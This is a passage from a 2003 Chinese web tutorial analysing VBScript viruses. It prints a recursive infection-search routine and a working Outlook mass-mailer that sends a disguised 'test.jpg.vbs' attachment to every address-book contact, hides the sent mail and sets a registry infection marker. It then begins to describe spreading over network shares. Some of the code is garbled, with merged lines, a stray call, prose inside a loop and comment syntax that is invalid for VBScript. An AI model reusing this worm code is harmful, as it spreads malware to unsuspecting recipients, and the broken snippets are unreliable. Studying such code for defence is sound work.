加入收藏
联系我们
关于我们
首页  |  软件下载  |  源码下载  |  模版下载  |  教程下载  |  网络学院  |  图片素材  |  
 您现在的位置: 亿聪 >> 网络学院 >> 网络安全 >> 正文  
  VBS脚本病毒原理分析与防范         ★★★
VBS脚本病毒原理分析与防范
[ 作者:guojpeng/cvc.gb    转贴自:CCID    点击数:25692    更新时间:2003/8/20    文章录入:亿聪 ] 
'该函数主要用来寻找满足条件的文件,并生成对应文件的一个病毒副本
sub scan(folder_)    'scan函数定义,
on error resume next    '如果出现错误,直接跳过,防止弹出错误窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files  ' 当前目录的所有文件集合
for each file in filesext=fso.GetExtensionName(file)    
      '获取文件后缀
ext=lcase(ext)    '后缀名转换成小写字母
if ext="mp5" then    '如果后缀名是mp5,则进行感染。
请自己建立相应后缀名的文件,最好是非正常后缀名 ,以免破坏正常程序。 
Wscript.echo (file)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders   
 '搜索其他目录;递归调用
  scan( )  
  scan(subfolder)
next 
end sub


上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍,非常巧妙,采用了一个递归的算法遍历整个分区的目录和文件。

2.vbs脚本病毒通过网络传播的几种方式及代码分析

VBS脚本病毒之所以传播范围广,主要依赖于它的网络传播功能,一般来说,VBS脚本病毒采用如下几种方式进行传播:

1)通过Email附件传播

这是一种用的非常普遍的传播方式,病毒可以通过各种方法拿到合法的Email地址,最常见的就是直接取outlook地址簿中的邮件地址,也可以通过程序在用户文档(譬如htm文件)中搜索Email地址。

下面我们具体分析一下VBS脚本病毒是如何做到这一点的: 

Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject("Outlook.Application") 
//创建一个OUTLOOK应用的对象
If outlookApp= "Outlook" Then
  Set mapiObj=outlookApp.GetNameSpace("MAPI") 
  //获取MAPI的名字空间
  Set addrList= mapiObj.AddressLists        
 //获取地址表的个数
  For Each addr In addrList
 If  addr.AddressEntries.Count <> 0 Then
 addrEntCount = addr.AddressEntries.Count 
//获取每个地址表的Email记录数
 For addrEntIndex= 1 To addrEntCount   
 //遍历地址表的Email地址
Set item = outlookApp.CreateItem(0)  
  //获取一个邮件对象实例
Set addrEnt = addr.AddressEntries(addrEntIndex)  
 //获取具体Email地址
item.To = addrEnt.Address             
 //填入收信人地址   
item.Subject = "病毒传播实验"  
  //写入邮件标题
item.Body = "这里是病毒邮件传播测试,收到此信请不要慌张!
"  //写入文件内容
 Set attachMents=item.Attachments   //定义邮件附件
attachMents.Add fileSysObj.GetSpecialFolder(0)&"\test.jpg.vbs"
item.DeleteAfterSubmit = True    
  //信件提交后自动删除
If item.To <> "" Then  
 item.Send                   
  //发送邮件
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" 
//病毒标记,以免重复感染
 End If
Next
End If
Next
End if
End Function


2)通过局域网共享传播

局域网共享传播也是一种非常普遍并且有效的网络传播方式。一般来说,为了局域网内交流方便,一定存在不少共享目录,并且具有可写权限,譬如win2000创建共享时,默认就是具有可写权限。这样病毒通过搜索这些共享目录,就可以将病毒代码传播到这些目录之中。

在VBS中,有一个对象可以实现网上邻居共享文件夹的搜索与文件操作。我们利用该对象就可以达到传播的目的。

上一页  [1] [2] [3] [4] [5] [6] [7]  下一页
  • 上一篇文章: 10步打造安全的FTP服务器

  • 下一篇文章: 防范内网遭受DoS攻击的预防策略
    • 发表评论】【告诉好友】【打印此文】【关闭窗口
     最新5篇热点文章
  • Knoppix 4.0.2 免硬盘免安…[15797]

  • 通过ASP记录进行分页[20012]

  • ASP开发准则[11932]

  • ASP组件指南[11943]

  • ASP指南[11967]

    		•
    		 
     最新5篇推荐文章
  • Knoppix 4.0.2 免硬盘免安…[15797]

  • 如何让Win 2003系统更加安…[13301]

  • Nero超刻简明教程[34139]

  • PS商业实战-来杯茶,行吗?…[7255]

  • ASP深度揭密(下)[12553]

    		•
    		 
     相 关 文 章
    没有相关文章

      网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
        没有任何评论
    设为首页 | 加入收藏 | 关于我们 | 联系我们 | 友情链接 | 版权声明 | 管理登录
    Copyright © 2000-2022 Yicong.com.All Rights Reserved.
    亿聪 版权所有 E-mail: